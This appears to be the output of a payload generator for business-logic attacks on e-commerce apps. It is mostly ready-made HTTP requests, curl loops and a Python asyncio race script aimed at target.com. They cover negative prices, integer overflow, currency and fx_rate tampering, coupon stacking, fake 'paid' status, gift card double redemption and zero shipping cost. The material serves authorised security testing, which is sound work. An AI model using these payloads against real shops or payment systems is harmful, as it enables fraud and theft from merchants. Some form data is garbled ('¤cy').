$loading...
Generate payload examples for business logic vulnerabilities: price and payment manipulation, workflow step skipping, race condition attacks, IDOR privilege escalation, and mass assignment flaws. Configure your target app type and auth method to get context-accurate HTTP request examples.
# ── Negative Price / Quantity Attack ──────────────────────────────────
# Goal: cause total order value to go negative, receiving a refund or credit
# Test: set quantity to -1 or price to negative value
# JSON request body:
POST /api/cart/add HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
{
"item_id": "ITEM-123",
"quantity": -1,
"price": -100.00
}
# Form data variant:
POST /checkout HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
item_id=ITEM-123&quantity=-1&price=-100.00&unit_price=-100.00
# What to check:
# 1. Does total become negative?
# 2. Is a refund/credit issued?
# 3. Does the order complete with negative total?
# 4. Try quantity=-2147483647 (integer underflow)# ── Integer Overflow — Quantity Field ─────────────────────────────────
# Goal: overflow integer type to wrap to 0 or negative value
POST /api/order HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
{
"item_id": "ITEM-123",
"quantity": 2147483647,
"price": 100.00
}
# Alternative: 32-bit unsigned max
{
"item_id": "ITEM-123",
"quantity": 4294967295
}
# Alternative: very large number (forces float → int truncation)
{
"item_id": "ITEM-123",
"quantity": 9999999999
}
# Expected overflow behavior:
# 2147483647 + 1 → -2147483648 (signed 32-bit overflow)
# Total: -2147483648 * 100.00 = massively negative value
# Check if server computes total client-side or server-side# ── Currency Confusion Attack ─────────────────────────────────────────
# Goal: submit in low-value currency, get charged as if high-value currency
POST /api/payment HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
{
"amount": 100.00,
"currency": "JPY",
"currency_code": "USD",
"display_currency": "USD"
}
# Tamper fx_rate parameter:
{
"amount": 100.00,
"currency": "USD",
"fx_rate": 0.001,
"base_currency": "EUR"
}
# Parameter pollution — send both:
POST /api/checkout?currency=USD HTTP/1.1
Content-Type: application/x-www-form-urlencoded
amount=100.00¤cy=JPY¤cy_code=USD
# Also test: negative fx_rate, fx_rate=0, fx_rate=1000000# ── Coupon Stacking — Apply Same Coupon Multiple Times ─────────────────
# Method 1: Direct repeated application
POST /api/cart/coupon HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
{"coupon_code": "SAVE20", "cart_id": "cart_xyz"}
# Send same request 5x — check if discount stacks:
for i in {1..5}; do
curl -s -X POST https://target.com/api/cart/coupon \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...' \
-d '{"coupon_code":"SAVE20","cart_id":"cart_xyz"}'
done
# Method 2: Race condition — parallel coupon application
# Using Turbo Intruder (Burp Suite):
# engine = Engine.THREADED(30)
# for i in range(30):
# engine.queue(target.req, ['SAVE20'])
# Method 3: Multiple coupon codes for same promotion
{"coupon_codes": ["SAVE20", "SAVE20", "SAVE20"]}
# Method 4: Case/whitespace variants
{"coupon_code": " SAVE20 "}
{"coupon_code": "save20"}
{"coupon_code": "SAVE20 "}# ── Partial Payment Bypass ────────────────────────────────────────────
# Goal: complete order while paying minimal amount
POST /api/checkout/complete HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
{
"order_id": "ITEM-123",
"amount": 0.01,
"total": 100.00,
"payment_status": "paid"
}
# Method 2: payment_method null bypass
{
"order_id": "ITEM-123",
"amount": 100.00,
"payment_method": null,
"skip_payment": true
}
# Method 3: Split payment exploitation
# Payment 1:
{"order_id": "ITEM-123", "amount": 0.01, "split": true, "split_index": 1}
# Then claim order is fully paid without sending payment 2
# Method 4: Tamper payment_amount after price calculated
POST /checkout/step3 HTTP/1.1
payment_token=tok_valid&payment_amount=0.01&order_total=100.00# ── Gift Card Race Condition — Double Redemption ──────────────────────
# Goal: redeem same gift card twice via concurrent requests
# Single redemption:
POST /api/giftcard/redeem HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
{"code": "GIFT-XXXX-YYYY", "amount": 100.00}
# Race attack — send N requests simultaneously:
# Python asyncio example:
import asyncio, aiohttp
async def redeem(session, code):
return await session.post(
"https://target.com/api/giftcard/redeem",
json={"code": code, "amount": 100.00}
)
async def main():
async with aiohttp.ClientSession() as session:
tasks = [redeem(session, "GIFT-XXXX-YYYY") for _ in range(20)]
results = await asyncio.gather(*tasks)
for r in results:
print(await r.json())
asyncio.run(main())
# Check if balance goes negative or multiple successes returned# ── Shipping Cost Manipulation ────────────────────────────────────────
# Goal: bypass shipping cost by tampering hidden fields
POST /checkout/shipping HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
shipping_method=standard&shipping_cost=0&order_total=100.00&item_id=ITEM-123
# Method 2: Add free shipping coupon after total calculation
# Step 1: Calculate total (100.00 + shipping cost)
POST /api/cart/calculate
{"item_id": "ITEM-123", "quantity": 1}
# Response: {"total": 100.00, "shipping": 9.99, "order_id": "ord_123"}
# Step 2: Apply free shipping coupon to calculated order
POST /api/cart/coupon
{"coupon_code": "FREESHIP", "order_id": "ord_123"}
# Step 3: Re-submit with shipping_cost=0 from modified response
POST /checkout/confirm
{"order_id": "ord_123", "shipping_cost": 0, "total": 100.00}
# Also test: negative shipping cost to reduce order total below zero